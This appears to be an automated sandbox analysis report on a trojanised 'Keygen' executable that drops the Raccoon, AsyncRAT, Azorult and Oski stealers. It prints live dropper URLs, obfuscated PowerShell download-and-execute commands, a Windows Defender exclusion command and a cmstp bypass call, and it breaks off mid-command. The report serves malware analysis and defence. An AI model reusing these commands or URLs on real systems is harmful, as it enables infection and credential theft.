Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    151s
  • max time network
    168s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    02-10-2020 21:14

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (81) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 23:40:18 GMT Bot_ID: 750D7400-3B08-415E-A8B0-2695D81425F5_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 0 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: UCQFZDUI - Username: Admin - Windows version: NT 6.1 - Product name: Windows 7 Professional - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 2047 MB (534 MB used) - Screen resolution: 1280x720 - Display devices: 0) Standard VGA Graphics Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 23 IoCs
  • Loads dropped DLL 50 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (81) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (81) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1468
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\74B3.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (81) — ?????.exe""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1688
      • C:\Users\Admin\AppData\Local\Temp\74B3.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1764
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\74B3.tmp\m.hta"
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1876
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1668
          • C:\Users\Public\uzq.exe
            "C:\Users\Public\uzq.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            PID:2596
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2812
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                PID:2084
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 840
                  8⤵
                  • Loads dropped DLL
                  • Program crash
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2944
            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
              "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:2836
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                7⤵
                • Executes dropped EXE
                PID:2268
            • C:\Users\Public\uzq.exe
              "C:\Users\Public\uzq.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Drops desktop.ini file(s)
              • Modifies system certificate store
              PID:2952
              • C:\Users\Admin\AppData\Local\Temp\PMaGMdTUQH.exe
                "C:\Users\Admin\AppData\Local\Temp\PMaGMdTUQH.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:2740
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                  "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\PMaGMdTUQH.exe"'
                  8⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2020
              • C:\Users\Admin\AppData\Local\Temp\YI602NCPAu.exe
                "C:\Users\Admin\AppData\Local\Temp\YI602NCPAu.exe"
                7⤵
                • Executes dropped EXE
                • Modifies system certificate store
                PID:536
                • C:\Windows\SysWOW64\Notepad.exe
                  "C:\Windows\System32\Notepad.exe"
                  8⤵
                    PID:2432
                • C:\Users\Admin\AppData\Local\Temp\IGax9cxEJz.exe
                  "C:\Users\Admin\AppData\Local\Temp\IGax9cxEJz.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:1416
                  • \??\c:\windows\SysWOW64\cmstp.exe
                    "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\ypib34pk.inf
                    8⤵
                      PID:2636
                  • C:\Users\Admin\AppData\Local\Temp\4byn5RgkFI.exe
                    "C:\Users\Admin\AppData\Local\Temp\4byn5RgkFI.exe"
                    7⤵
                    • Executes dropped EXE
                    • Windows security modification
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2172
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "powershell" Get-MpPreference -verbose
                      8⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1428
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\uzq.exe"
                    7⤵
                      PID:3068
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /T 10 /NOBREAK
                        8⤵
                        • Delays execution with timeout.exe
                        PID:2856
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\74B3.tmp\m1.hta"
              3⤵
              • Modifies Internet Explorer settings
              • Suspicious use of WriteProcessMemory
              PID:1880
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1564
            • C:\Windows\SysWOW64\timeout.exe
              timeout 1
              3⤵
              • Delays execution with timeout.exe
              PID:1836
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\74B3.tmp\b.hta"
              3⤵
              • Modifies Internet Explorer settings
              • Suspicious use of WriteProcessMemory
              PID:1976
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 